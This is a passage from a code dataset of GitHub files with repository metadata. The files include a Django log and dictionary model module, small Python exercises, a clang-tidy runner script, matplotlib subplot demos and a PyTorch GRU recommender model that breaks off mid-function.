CacheAttribute\nfrom framework.utils.myenum import Enum\nfrom framework.validators import LetterValidator\n\ntry:\n import cPickle as pickle\nexcept ImportError:\n import pickle\nimport json\nfrom framework.settings import settings\nimport traceback\nimport os\n\n\nclass BigIntegerAutoField(fields.BigIntegerField):\n def db_type(self, connection):\n if 'mysql' in connection.__class__.__module__:\n return 'bigint AUTO_INCREMENT'\n return super(BigIntegerAutoField, self).db_type(connection)\n\n\nclass BaseLog(models.Model, SqlModelMixin):\n \"\"\"日志基本模型\n '含有空值的列很难进行查询优化,因为它们使得索引、索引的统计信息以及比较运算更加复杂。你应该用0、一个特殊的值或者一个空串代替空值。\n\n \"\"\"\n # https://blog.jcole.us/2013/05/02/how-does-innodb-behave-without-a-primary-key/\n\n id = models.BigAutoField(primary_key=True)\n\n def __unicode__(self):\n return '%d_%d_%s' % (self.log_type, self.log_user, self.log_time.strftime('%Y-%m-%d'))\n\n def log_time_str(self):\n return datetime_to_str(self.log_time)\n\n def get_table_name(cls):\n return cls._Meta.db_table\n\n @classmethod\n def get_create_table_sql(cls, table_name):\n sql = 'CREATE TABLE IF NOT EXISTS %s LIKE %s;' % (table_name, cls._Meta.db_table)\n return sql\n\n class _Meta: # 防止使用log表时失去元表名\n abstract = True\n db_table = u'log_0_new'\n\n Meta = _Meta\n\n\nLog = BaseLog\n\n\nclass LogDefineMixin(object):\n class FieldType(Enum):\n pass\n\n @classmethod\n def get_truncate_table_sqls(cls):\n sqls = []\n log_defs = cls.objects.filter(status=cls.Status.NORMAL)\n for ld in log_defs:\n if ld.key == 'statistic_date':\n continue\n sqls.append('truncate table %s;' % ld.table_name)\n return sqls\n\n def get_create_table_sql(self):\n return self.LogModel.get_create_table_sql(self.table_name)\n\n def get_create_index_sqls(self, default_index=True):\n sqls = []\n for f in self.get_index_fields(default_index):\n index_name = '%s_%s_index' % (self.table_name, f['filed_name'])\n sql = \"CREATE INDEX `%s` ON `%s` (%s);\" % (index_name, self.table_name, f['filed_name'])\n sqls.append(sql)\n return sqls\n\n def get_default_config(self):\n \"\"\"默认的日志类配置\n \"\"\"\n _d = {}\n for f in self.LogModel._meta.fields:\n if f.name.lower() == 'id':\n continue\n\n _d[f.name] = {\"default_db_index\": f.db_index, \"verbose_name\": f.verbose_name, 'type': ''}\n return _d\n\n def get_index_fields(self, default_index=True):\n index_fields = []\n default_config = self.get_default_config()\n for k, v in self.config.items():\n if v.get('db_index', '') and v.get('verbose_name', '').strip():\n v['filed_name'] = k\n # 默认索引选择创建\n if v.get('default_db_index') and not default_index:\n continue\n index_fields.append(v)\n return index_fields\n\n @classmethod\n def get_create_table_sqls(cls, is_center=False):\n \"\"\"获取需要创建表的sql\n \"\"\"\n status = cls.Status.CENTER if is_center else cls.Status.NORMAL\n sqls = []\n for t in cls.objects.filter(status=status):\n sqls.append(t.get_create_table_sql())\n return sqls\n\n def get_field_name_by_verbose_name(self, verbose_name):\n for field_name, config in self.config:\n if verbose_name == config['verbose_name']:\n return field_name\n\n\nclass LogDefine(BaseModel, LogDefineMixin):\n \"\"\"日志类定义\n \"\"\"\n\n LogModel = Log\n\n class PositionType(Enum):\n SERVER = 0, _('分服')\n CENTER = 1, _('中央服')\n KUAFU = 2, _('跨服')\n\n Status = PositionType\n\n name = models.CharField(_('日志名'), max_length=50)\n key = models.CharField(_('日志表标识'), max_length=100, db_index=True, validators=[LetterValidator])\n remark = models.CharField(_('备注'), max_length=1000)\n status = models.IntegerField(_('保存位置'), default=0, choices=PositionType.member_list())\n _config = models.TextField(_('配置'))\n trigger = models.TextField(_('触发器sql'), default=\"\", null=False, blank=True)\n\n # todo 这里未来兼容sql文件导入和mysqldb执行的sql 处理有点乱, 到时再改\n def get_other_sqls(self, is_sql_file=False):\n \"\"\"获取其他sql\n @is_sql_file:是否sql文件用的\n \"\"\"\n sqls = []\n sp = ';'\n the_cut_sp = '\\\\'\n if '//' in self.trigger:\n sp = '//'\n for sql in self.trigger.split(sp):\n if the_cut_sp in sql:\n if is_sql_file:\n sql = sql.replace(the_cut_sp, '')\n else:\n sql = ''\n elif not is_sql_file:\n sql = sql.replace('$$', '')\n if sql:\n sqls.append('%s' % sql)\n return sqls\n\n @property\n def config(self):\n _r = {}\n field_config = self.get_default_config()\n try:\n _r = json.loads(self._config)\n for k in sorted(_r.keys(), reverse=True):\n field_config[k].update(_r.get(k, {}))\n except:\n pass\n _r = field_config\n\n return _r\n\n @config.setter\n def config(self, obj_value):\n if isinstance(obj_value, dict):\n obj_value = json.dumps(obj_value)\n self._config = obj_value\n\n @CacheAttribute\n def json_config(self):\n\n return json_dumps(self.config)\n\n @property\n def table_name(self):\n return 'log_%s' % self.key.strip()\n\n def save(self, *args, **kwargs):\n return super(LogDefine, self).save(*args, **kwargs)\n\n def __unicode__(self):\n return '%s' % self.key\n\n class Meta:\n pass\n\n\nclass DictBaseType(object):\n \"\"\"基本字典类型\n \"\"\"\n NAME = '字典'\n DEFAULT_JSON = '{}'\n\n def __init__(self, dict_config):\n self.dict = dict_config\n\n def get_dict(self):\n return self.dict\n\n\nclass DBDictType(DictBaseType):\n \"\"\"数据表\n \"\"\"\n NAME = '数据表'\n DEFAULT_JSON = '{\"db\":\"\",\"table_name\":\"\",\"key_name\":\"\",\"show_name\":\"\",\"sql\":\"\"}'\n\n def get_dict(self):\n from analysis.models import QueryServer\n db = self.dict.get('db', '')\n if db:\n the_server = QueryServer.objects.using('read').filter(name=db).first()\n if the_server:\n the_conn = the_server.mysql_conn(True)\n the_conn.autocommit(1)\n\n else:\n the_conn = connections[db]\n else:\n the_conn = connections['read']\n\n _r = {}\n sql = self.dict.get('sql', '')\n if not sql:\n sql = 'SELECT DISTINCT `{key_name}` a,`{show_name}` b FROM {table_name} LIMIT 10000;'\n sql = sql.format(**self.dict)\n cur = the_conn.cursor()\n cur.execute(sql)\n for row in cur.fetchall():\n _r[str(row[0])] = row[1]\n return _r\n\n\nROOT_PATH = settings.BASE_DIR\n\n\nclass UrlDictType(DictBaseType):\n \"\"\"从url请求地址获取\n \"\"\"\n NAME = 'URL'\n DEFAULT_JSON = '{\"url\":\"\",\"method\":\"get\",\"key_name\":\"\",\"show_name\":\"\"}'\n\n def get_dict(self):\n _r = {}\n url = self.dict.get('url')\n try:\n if url:\n rsp = requests.request(self.dict.get('method'))\n _r = rsp.json()\n except Exception as e:\n traceback.print_exc()\n return _r\n\n\nclass FileDictType(DictBaseType):\n \"\"\"从文件内拿json\n \"\"\"\n NAME = '文件'\n DEFAULT_JSON = '{\"file_path\":\"\",\"key_name\":\"\",\"show_name\":\"\"}'\n\n def get_dict(self):\n _r = {}\n the_file_path = os.path.join(ROOT_PATH, self.dict['file_path'])\n try:\n with open(the_file_path, 'rb') as fp:\n _r = the_dict_data = json.loads(fp.read())\n except:\n pass\n return _r\n\n\nfrom framework.utils import get_files_from_dir\n\n\nclass DirDictType(DictBaseType):\n \"\"\"目录里拿字典\n \"\"\"\n NAME = '目录'\n DEFAULT_JSON = '{\"dir_path\":\"\",\"key_name\":\"\",\"show_name\":\"\"}'\n\n def get_dict(self):\n _r = {}\n the_dir_path = os.path.join(ROOT_PATH, self.dict['dir_path'])\n\n try:\n if os.path.isdir(the_dir_path):\n for the_json_file in get_files_from_dir(the_dir_path, '.json'):\n\n with open(the_json_file, 'rb') as fp:\n json_str = fp.read()\n json_data = json.loads(json_str)\n key_name = self.dict.get('key_name', '')\n show_name = self.dict.get('show_name', '')\n if key_name and show_name:\n key = json_data.get(key_name, '')\n value = json_data.get(show_name, '')\n if key:\n _r[key] = value\n except:\n print(the_dir_path)\n traceback.print_exc()\n return _r\n\n\nclass DictDefine(BaseModel):\n \"\"\"字典定义\n \"\"\"\n TYPE_DICT = {0: DictBaseType,\n 1: DBDictType,\n 2: FileDictType,\n 3: DirDictType,\n 4: UrlDictType\n }\n\n SELECT_CHOICES = [(k, v.NAME, v.DEFAULT_JSON) for k, v in TYPE_DICT.items()]\n _TYPE_CHOICES = ((k, v.NAME) for k, v in TYPE_DICT.items())\n\n name = models.CharField('字典名', max_length=100, blank=False)\n key = models.CharField('标识名', max_length=50, unique=True, db_index=True, validators=[LetterValidator])\n json_dict = JSONField('存键值', default='{}', null=False, blank=True)\n group = models.CharField('组', max_length=50, default=\"\", blank=True)\n type = models.IntegerField('字典的类型', default=0, choices=_TYPE_CHOICES)\n remark = models.CharField('备注', max_length=400, default='', blank=True)\n\n __cache_dict = {}\n\n def __unicode__(self):\n return '%s' % self.name\n\n class Meta:\n pass\n\n @property\n def dict(self):\n try:\n _d = json.loads(self.json_dict)\n except:\n _d = {}\n return _d\n\n @dict.setter\n def dict(self, obj_value):\n # for k, v in obj_value.items():\n # obj_value[k] = v.encode('utf-8')\n _data = json.dumps(obj_value)\n self.json_dict = _data\n\n @classmethod\n def get_dict_for_key(cls, key_name, reverse=False):\n _r = {}\n try:\n if '{' in key_name:\n _r = json.loads(key_name)\n else:\n dict_model = cls.objects.get(key=key_name)\n _r = dict_model.get_dict()\n if reverse:\n _r = cls.reverse_dict(_r)\n except:\n pass\n return _r\n\n @staticmethod\n def reverse_dict(_dict):\n \"\"\"反转字典\n \"\"\"\n return dict((v, k) for k, v in _dict.items())\n\n def get_dict(self):\n \"\"\"获取字典\n \"\"\"\n _r = {}\n if self.__cache_dict: return self.__cache_dict\n type_class = self.TYPE_DICT.get(self.type)\n try:\n dict_handler_obj = type_class(self.dict)\n _r = dict_handler_obj.get_dict()\n except:\n traceback.print_exc()\n self.__cache_dict = _r\n return self.__cache_dict\n\n def get_json_data(self):\n return self.json_dict\n\n @classmethod\n def get_group(cls):\n \"\"\"获取字典的分组\n \"\"\"\n groups = [g for g in cls.objects.using('read').values_list('group', flat=True).distinct() if g]\n return groups\n","repo_name":"xzregg/djmyframework","sub_path":"djmyframework/apps/log_def/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":12171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33447787401","text":"smax = int(input())\ntoeschouwers = input()\nstaand = 0\nvrienden = 0\n\nfor s in range (0,smax+1):\n # print('Checking s: '+str(s))\n while True:\n comp = staand+vrienden\n # print('Comparing s = '+str(s)+' with staand+vrienden = '+str(comp))\n if s <= comp:\n # print('s <= comp')\n staand = staand + int(toeschouwers[s])\n break\n else:\n# print('s > comp')\n vrienden += 1\n\n\n#print('Final output: ')\nprint(str(vrienden))","repo_name":"mshessey/WISB256","sub_path":"Oefenopgaven/StaandeOvatie.py","file_name":"StaandeOvatie.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20371969085","text":"try:\n res = 100 / 0\n# except(ошибок) может быть много\nexcept ZeroDivisionError:\n print('O!')\n# else выполняется когда все хорошо, else можно использовать для явного вывода - все хорошо\nelse:\n print(f'Res = {round(res, 2)}')\n# finally выполняется по любому, независимо от того пошло все хорошо или плохо\nfinally:\n print('Game over')","repo_name":"Djam290580/lesson_6","sub_path":"lesson_8/practic_8.5.except.py","file_name":"practic_8.5.except.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38126512468","text":"from MiniMaxSearch import MiniMaxSearch\nfrom Rushour import Rushhour\nfrom State import State\n\n\ndef test_print_move():\n rh = Rushhour([True], [2], [2], [\"rouge\"])\n s = State([0])\n s = s.put_rock((3,1)) # Roche dans la case 3-1\n s = s.move(0, 1) # Voiture rouge vers la droite\n\n algo = MiniMaxSearch(rh, s, 1)\n algo.print_move(True, s)\n algo.print_move(False, s)\n\ntest_print_move()","repo_name":"olivierND/INF8215","sub_path":"TP2/tests/test_print_move.py","file_name":"test_print_move.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5241079457","text":"# -*- coding: utf-8 -*-\n\nfrom openfisca_core.entities import build_entity\n\nFamille = build_entity(\n key = \"famille\",\n plural = \"familles\",\n label = u'Famille',\n roles = [\n {\n 'key': 'parent',\n 'plural': 'parents',\n 'label': u'Parents',\n 'subroles': ['demandeur', 'conjoint']\n },\n {\n 'key': 'enfant',\n 'plural': 'enfants',\n 'label': u'Enfants',\n }\n ]\n )\n\n\nIndividu = build_entity(\n key = \"individu\",\n plural = \"individus\",\n label = u'Individu',\n is_person = True,\n )\n\nentities = [Individu, Famille]\n","repo_name":"openfisca/openfisca-dummy-country","sub_path":"openfisca_dummy_country/entities.py","file_name":"entities.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"69938094634","text":"class Car:\n def __init__(self, man: str, mod: str, col: str, year, fuel_consumption, tank_capacity):\n self.manufacterer = man\n self.model = mod\n self.color = col\n self.year = year\n self.fuel_consumption = fuel_consumption\n self.tank_capacity = tank_capacity\n self.km = 0\n self.fuel = 0\n def __str__(self):\n return f\"{self.manufacterer}, {self.model}, {self.color}\"\n\n def fill_tank(self, liters: int):\n if 0 < liters <= self.tank_capacity - self.fuel:\n self.fuel += liters\n return True\n return False\n\n def drive(self, km):\n if km > 0 and self.fuel * (100/self.fuel_consumption) >= km:\n self.km += km\n self.fuel -= (self.fuel_consumption/100) * km\n return True\n return False","repo_name":"HassanKhCode/Practicing","sub_path":"12-12-2022/Car.py","file_name":"Car.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40812262269","text":"import sys\nimport os\nimport argparse\nimport subprocess\nfrom termcolor import cprint\n\nfrom setup_clang_tidy import setup_clang_tidy\nfrom parse_clang_tidy_res import warn_txt_parse, INFO, ERROR\n\n\ndef run_clang_tidy(prj_dir: str, verbose: bool, clang_tidy_cfg_dir: str):\n \"\"\"\n Run clang-tidy through the ESP IDF clang-check command.\n\n Parameters\n ----------\n prj_dir : str\n ESP IDF project directory configured for clang-check. Should be one of the examples in this\n repository.\n verbose : bool\n When true, stream to the STDOUT the output of all the commands, hide them otherwise.\n clang_tidy_cfg_dir : str\n Absolute path to the .clang-tidy configuration file to pass to clang-tidy.\n \"\"\"\n cprint(\"Running the checker.\", color=INFO, flush=True)\n\n run_clang_tidy_py_args = f\"-config-file={clang_tidy_cfg_dir}\"\n cmds = [\n 'export PATH=\"$PWD:$PATH\"',\n \" \".join(\n [\n \"idf.py\",\n \"clang-check\",\n \"--run-clang-tidy-options\",\n f'\"{run_clang_tidy_py_args}\"',\n \"--include-paths $PWD/../..\",\n ]\n ),\n ]\n ret = subprocess.run(\n \"&&\".join(cmds),\n capture_output=not verbose,\n shell=True,\n cwd=prj_dir,\n check=False,\n )\n if ret.returncode:\n cprint(\"Failure in running the checker.\", color=ERROR, flush=True)\n print(ret.stderr, flush=True)\n print(ret.stdout, flush=True)\n sys.exit(1)\n\n # Check if resulting report is not empty.\n with open(os.path.join(prj_dir, \"warnings.txt\"), encoding=\"utf-8\") as warnings_txt_fp:\n if len(warnings_txt_fp.readlines()) < 2:\n cprint(\"Clang tidy did not generate the correct output.\", color=ERROR, flush=True)\n sys.exit(1)\n\n\n# When running as a standalone script\nif __name__ == \"__main__\":\n # Command line arguments are often duplicated.\n # pylint: disable=duplicate-code\n\n # Parse command line arguments\n DESCTIPTION = (\n \"Utility for running ESP IDF clang-check and analyze the result. \"\n r\"The export.sh\\export.bat\\export.fish script should be run before this script. \"\n \"The default values of --project-dir and --clang-tidy-dir assume you are running this\"\n \" script from the main folder in this repository.\"\n )\n parser = argparse.ArgumentParser(description=DESCTIPTION)\n parser.add_argument(\n \"-p\",\n \"--project-dir\",\n dest=\"prj_dir\",\n default=os.path.join(os.getcwd(), \"examples\", \"datastreams\"),\n help=(\n \"ESP IDF project directory in which to clang-run should be run. \"\n \"Defaults to the datastreams example folder.\"\n ),\n )\n parser.add_argument(\n \"-c\",\n \"--clang-tidy-dir\",\n dest=\"clang_tidy_cfg_dir\",\n default=os.path.join(os.getcwd(), \".clang-tidy\"),\n help=\"The absolute path to the .clang-tidy configuration file.\",\n )\n parser.add_argument(\n \"-a\",\n \"--also_install\",\n dest=\"also_install\",\n action=\"store_true\",\n help=\"Setup clang-tidy before running it.\",\n )\n parser.add_argument(\n \"-n\",\n \"--no-run\",\n dest=\"no_run\",\n action=\"store_true\",\n help=\"When set, do not run. Use the result of the last run.\",\n )\n parser.add_argument(\n \"-t\",\n \"--trim\",\n dest=\"trim\",\n action=\"store_true\",\n help=\"When set, trim the report printed to stdout.\",\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n dest=\"verbose\",\n action=\"store_true\",\n help=\"When set, print more information to the stdout.\",\n )\n parser.add_argument(\n \"-r\",\n \"--remove-clang-diag\",\n dest=\"remove_clang_diag\",\n action=\"store_true\",\n help=\"Remove warnings and errors generated by the clang compiler diagnostic.\",\n )\n parser.add_argument(\n \"-f\",\n \"--filter\",\n dest=\"code_filter\",\n default=r\".*\",\n help=\"A regex used for filtering the clang-tidy error codes. Defaults to '*.'\",\n )\n\n args = parser.parse_args()\n\n if args.also_install and not args.no_run:\n setup_clang_tidy(args.prj_dir, args.verbose)\n else:\n cprint(\"Skipping the environment configuration.\", color=INFO, flush=True)\n\n if not args.no_run:\n run_clang_tidy(args.prj_dir, args.verbose, args.clang_tidy_cfg_dir)\n else:\n cprint(\"Using an old analysis result.\", color=INFO, flush=True)\n\n if warn_txt_parse(\n os.path.join(args.prj_dir, \"warnings.txt\"),\n args.trim,\n args.code_filter,\n args.remove_clang_diag,\n ):\n sys.exit(1)\n","repo_name":"astarte-platform/astarte-device-sdk-esp32","sub_path":"python_scripts/run_clang_tidy.py","file_name":"run_clang_tidy.py","file_ext":"py","file_size_in_byte":4729,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"37040586368","text":"# settings module itself should return local settings so that\n# manage.py commands work.\ntry:\n from .local import *\nexcept ImportError as e:\n settings_path = 'voxsnap/settings'\n error_message = '{mes} (did you copy {path}/local.example.py to {path}/local.py?)'.format(\n mes=e.args[0], path=settings_path)\n e.args = tuple([error_message])\n\n raise e\n","repo_name":"ngx-devman/Voxsnap","sub_path":"voxsnap/settings/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"1435060330","text":"import sys\nfrom bisect import *\nfrom collections import *\ninput = lambda : sys.stdin.readline().strip()\nintput = lambda : map(int, input().split())\nenum = enumerate\ndfd = defaultdict\n\ndef solve():\n N, = intput()\n A = Counter( intput() )\n ans = t = 0\n for x,c in A.items():\n ans += c % 2\n t += c + c % 2\n return ans + t%4\n\nif __name__ == '__main__':\n T, = intput()\n for _ in range(T):\n print( solve() )\n","repo_name":"henryliuser/hliu-cp","sub_path":"codechef/L0/recsti.py","file_name":"recsti.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"39567674675","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jan 10 16:51:09 2019\n\n@author: natasha_yang\n\n@e-mail: ityangna0402@163.com\n\"\"\"\n\nimport matplotlib.pyplot as plt\n\nplt.figure()\nplt.subplot(2, 2, 1)#2*2个中的第一个\nplt.plot([0, 1], [0, 1])\n\nplt.subplot(2, 2, 2)\nplt.plot([0, 1], [0, 2])\n\nplt.subplot(223)\nplt.plot([0, 1], [0, 3])\n\nplt.subplot(224)\nplt.plot([0, 1], [0, 4])\nplt.show()\n\n#不均匀图中图\nplt.figure()\nplt.subplot(2, 1, 1)#第一行\nplt.plot([0, 1], [0, 1])\n\nplt.subplot(2, 3, 4)#第二行,第一行3个,所以第二行开始的是编号4\nplt.plot([0, 1], [0, 2])\n\nplt.subplot(235)\nplt.plot([0, 1], [0, 3])\n\nplt.subplot(236)\nplt.plot([0, 1], [0, 4])\nplt.show()\n\n#分格显示\n####subplot2grid\nplt.figure()\n#(3,3)表示将整个图像窗口分成3行3列,(0,0)表示从第0行第0列开始作图,colspan=3表示列的跨度为3,rowspan=1表示行的跨度为1\n#---\nax1 = plt.subplot2grid((3, 3), (0, 0), colspan=3)\nax1.plot([1, 2], [1, 2])\nax1.set_title('ax1_title')\n\n#从第1行第0列开始作图\n#---\n# -\nax2 = plt.subplot2grid((3, 3), (1, 0), colspan=2)\nax3 = plt.subplot2grid((3, 3), (1, 2), rowspan=2)\n#--\nax4 = plt.subplot2grid((3, 3), (2, 0))\nax5 = plt.subplot2grid((3, 3), (2, 1))\n#ax4.scatter创建一个散点图,使用ax4.set_xlabel和ax4.set_ylabel来对x轴和y轴命名\nax4.scatter([1, 2], [2, 2])\nax4.set_xlabel('ax4_x')\nax4.set_ylabel('ax4_y')\nplt.show()\n\n####gridspec\nimport matplotlib.gridspec as gridspec\n#gridspec.GridSpec将整个图像窗口分成3行3列\nplt.figure()\ngs = gridspec.GridSpec(3, 3)\n#---\nax6 = plt.subplot(gs[0, :])\n#---\n# -\nax7 = plt.subplot(gs[1, :2])\nax8 = plt.subplot(gs[1:, 2])\n#--\nax9 = plt.subplot(gs[-1, 0])\nax10 = plt.subplot(gs[-1, -2])\nplt.show()\n\n####subplots\n#2行2列的图像窗口,sharex=True共享x轴坐标,sharey=True共享y轴坐标\nf, ((ax11, ax12), (ax13, ax14)) = plt.subplots(2, 2, sharex=True, sharey=True)\n#ax11.scatter创建一个散点图\nax11.scatter([1, 2], [1, 2])\n#紧凑显示图像\nplt.tight_layout()\nplt.show()","repo_name":"yangnaGitHub/LearningProcess","sub_path":"display/matplotlib_07.py","file_name":"matplotlib_07.py","file_ext":"py","file_size_in_byte":1997,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25481460086","text":"import numpy as np\nimport random\nimport sys\nimport os\nimport json\nfrom tqdm import tqdm\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch import optim\nimport torch.nn.functional as F\n\nnum_iter = 20 #epoch number\nhidden_size = 32\nnum_layers = 1\n\n# only one can be set 1\nuse_embedding = 1\nuse_linear_reduction = 0\n\natten_decoder = 1\nuse_dropout = 0\nuse_average_embedding = 1\n\nlabmda = 10\n\nMAX_LENGTH = 100\nlearning_rate = 0.001\nprint_val = 3000\nuse_cuda = torch.cuda.is_available()\n\n\nclass EncoderRNN_new(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers):\n super(EncoderRNN_new, self).__init__()\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.reduction = nn.Linear(input_size, hidden_size)\n self.embedding = nn.Embedding(input_size, hidden_size)\n self.time_embedding = nn.Embedding(input_size, hidden_size)\n self.time_weight = nn.Linear(input_size, input_size)\n if use_embedding or use_linear_reduction:\n self.gru = nn.GRU(hidden_size, hidden_size, num_layers)\n else:\n self.gru = nn.GRU(input_size, hidden_size, num_layers)\n\n def forward(self, input, hidden):\n if use_embedding:\n list = Variable(torch.LongTensor(input).view(-1, 1))\n if use_cuda:\n list = list.cuda()\n average_embedding = Variable(torch.zeros(hidden_size)).view(1, 1, -1)\n vectorized_input = Variable(torch.zeros(self.input_size)).view(-1)\n if use_cuda:\n average_embedding = average_embedding.cuda()\n vectorized_input = vectorized_input.cuda()\n\n for ele in list:\n embedded = self.embedding(ele).view(1, 1, -1)\n tmp = average_embedding.clone()\n average_embedding = tmp + embedded\n vectorized_input[ele] = 1\n\n if use_average_embedding:\n tmp = [1] * hidden_size\n length = Variable(torch.FloatTensor(tmp))\n if use_cuda:\n length = length.cuda()\n # for idx in range(hidden_size):\n real_ave = average_embedding.view(-1) / length\n average_embedding = real_ave.view(1, 1, -1)\n\n embedding = average_embedding\n else:\n tensorized_input = torch.from_numpy(input).clone().type(torch.FloatTensor)\n inputs = Variable(torch.unsqueeze(tensorized_input, 0).view(1, -1))\n if use_cuda:\n inputs = inputs.cuda()\n if use_linear_reduction == 1:\n reduced_input = self.reduction(inputs)\n else:\n reduced_input = inputs\n\n embedding = torch.unsqueeze(reduced_input, 0)\n\n output, hidden = self.gru(embedding, hidden)\n return output, hidden\n\n def initHidden(self):\n result = Variable(torch.zeros(num_layers, 1, self.hidden_size))\n if use_cuda:\n return result.cuda()\n else:\n return result\n\n\nclass AttnDecoderRNN_new(nn.Module):\n def __init__(self, hidden_size, output_size, num_layers, dropout_p=0.2, max_length=MAX_LENGTH):\n super(AttnDecoderRNN_new, self).__init__()\n self.hidden_size = hidden_size\n self.output_size = output_size\n self.dropout_p = dropout_p\n self.max_length = max_length\n\n self.embedding = nn.Embedding(self.output_size, self.hidden_size)\n if use_embedding or use_linear_reduction:\n self.attn = nn.Linear(self.hidden_size * 2, self.max_length)\n self.attn1 = nn.Linear(self.hidden_size + output_size, self.hidden_size)\n else:\n self.attn = nn.Linear(self.hidden_size + self.output_size, self.output_size)\n\n if use_embedding or use_linear_reduction:\n self.attn_combine = nn.Linear(self.hidden_size * 2, self.hidden_size)\n self.attn_combine3 = nn.Linear(self.hidden_size * 2 + output_size, self.hidden_size)\n else:\n self.attn_combine = nn.Linear(self.hidden_size + self.output_size, self.hidden_size)\n self.attn_combine5 = nn.Linear(self.output_size, self.output_size)\n self.dropout = nn.Dropout(self.dropout_p)\n self.reduction = nn.Linear(self.output_size, self.hidden_size)\n if use_embedding or use_linear_reduction:\n self.gru = nn.GRU(hidden_size, hidden_size, num_layers)\n else:\n self.gru = nn.GRU(hidden_size, hidden_size, num_layers)\n self.out = nn.Linear(self.hidden_size, self.output_size)\n\n def forward(self, input, hidden, encoder_outputs, history_record, last_hidden):\n if use_embedding:\n list = Variable(torch.LongTensor(input).view(-1, 1))\n if use_cuda:\n list = list.cuda()\n average_embedding = Variable(torch.zeros(hidden_size)).view(1, 1, -1)\n if use_cuda:\n average_embedding = average_embedding.cuda()\n\n for ele in list:\n embedded = self.embedding(ele).view(1, 1, -1)\n tmp = average_embedding.clone()\n average_embedding = tmp + embedded\n\n if use_average_embedding:\n tmp = [1] * hidden_size\n length = Variable(torch.FloatTensor(tmp))\n if use_cuda:\n length = length.cuda()\n # for idx in range(hidden_size):\n real_ave = average_embedding.view(-1) / length\n average_embedding = real_ave.view(1, 1, -1)\n\n embedding = average_embedding\n else:\n tensorized_input = torch.from_numpy(input).clone().type(torch.FloatTensor)\n inputs = Variable(torch.unsqueeze(tensorized_input, 0).view(1, -1))\n if use_cuda:\n inputs = inputs.cuda()\n if use_linear_reduction == 1:\n reduced_input = self.reduction(inputs)\n else:\n reduced_input = inputs\n\n embedding = torch.unsqueeze(reduced_input, 0)\n\n if use_dropout:\n droped_ave_embedded = self.dropout(embedding)\n else:\n droped_ave_embedded = embedding\n\n history_context = Variable(torch.FloatTensor(history_record).view(1, -1))\n if use_cuda:\n history_context = history_context.cuda()\n\n attn_weights = F.softmax(\n self.attn(torch.cat((droped_ave_embedded[0], hidden[0]), 1)), dim=1)\n attn_applied = torch.bmm(attn_weights.unsqueeze(0),\n encoder_outputs.unsqueeze(0))\n\n element_attn_weights = F.softmax(\n self.attn1(torch.cat((history_context, hidden[0]), 1)), dim=1)\n\n output = torch.cat((droped_ave_embedded[0], attn_applied[0]), 1)\n output = self.attn_combine(output).unsqueeze(0)\n\n output = F.relu(output)\n output, hidden = self.gru(output, hidden)\n\n linear_output = self.out(output[0])\n\n value = torch.sigmoid(self.attn_combine5(history_context).unsqueeze(0))\n\n one_vec = Variable(torch.ones(self.output_size).view(1, -1))\n if use_cuda:\n one_vec = one_vec.cuda()\n\n res = history_context.clone()\n res[history_context != 0] = 1\n # Linear后,要mask掉其他位置的,value为weight,gru的output需要减去weight,再weight*history_context.\n output = F.softmax(linear_output * (one_vec - res * value[0]) + history_context * value[0], dim=1)\n\n return output.view(1, -1), hidden, attn_weights\n\n def initHidden(self):\n result = Variable(torch.zeros(num_layers, 1, self.hidden_size))\n if use_cuda:\n return result.cuda()\n else:\n return result\n\n\nclass custom_MultiLabelLoss_torch(nn.modules.loss._Loss):\n def __init__(self):\n super(custom_MultiLabelLoss_torch, self).__init__()\n\n def forward(self, pred, target, weights):\n #balance the mseloss, incase that some items occurs frequently in the training dataset\n mseloss = torch.sum(weights * torch.pow((pred - target), 2))\n pred = pred.data\n target = target.data\n\n ones_idx_set = (target == 1).nonzero()\n zeros_idx_set = (target == 0).nonzero()\n\n ones_set = torch.index_select(pred, 1, ones_idx_set[:, 1])\n zeros_set = torch.index_select(pred, 1, zeros_idx_set[:, 1])\n\n repeat_ones = ones_set.repeat(1, zeros_set.shape[1])\n repeat_zeros_set = torch.transpose(zeros_set.repeat(ones_set.shape[1], 1), 0, 1).clone()\n repeat_zeros = repeat_zeros_set.reshape(1, -1)\n difference_val = -(repeat_ones - repeat_zeros)\n exp_val = torch.exp(difference_val)\n exp_loss = torch.sum(exp_val)\n normalized_loss = exp_loss / (zeros_set.shape[1] * ones_set.shape[1])\n set_loss = Variable(torch.FloatTensor([labmda * normalized_loss]), requires_grad=True)\n if use_cuda:\n set_loss = set_loss.cuda()\n loss = mseloss + set_loss\n\n return loss\n\ndef train(input_variable, target_variable, encoder, decoder, codes_inverse_freq, encoder_optimizer, decoder_optimizer,\n criterion, output_size, max_length=MAX_LENGTH):\n encoder_hidden = encoder.initHidden()\n\n encoder_optimizer.zero_grad()\n decoder_optimizer.zero_grad()\n\n input_length = len(input_variable)\n target_length = len(target_variable)\n\n encoder_outputs = Variable(torch.zeros(max_length, encoder.hidden_size))\n if use_cuda:\n encoder_outputs = encoder_outputs.cuda()\n\n 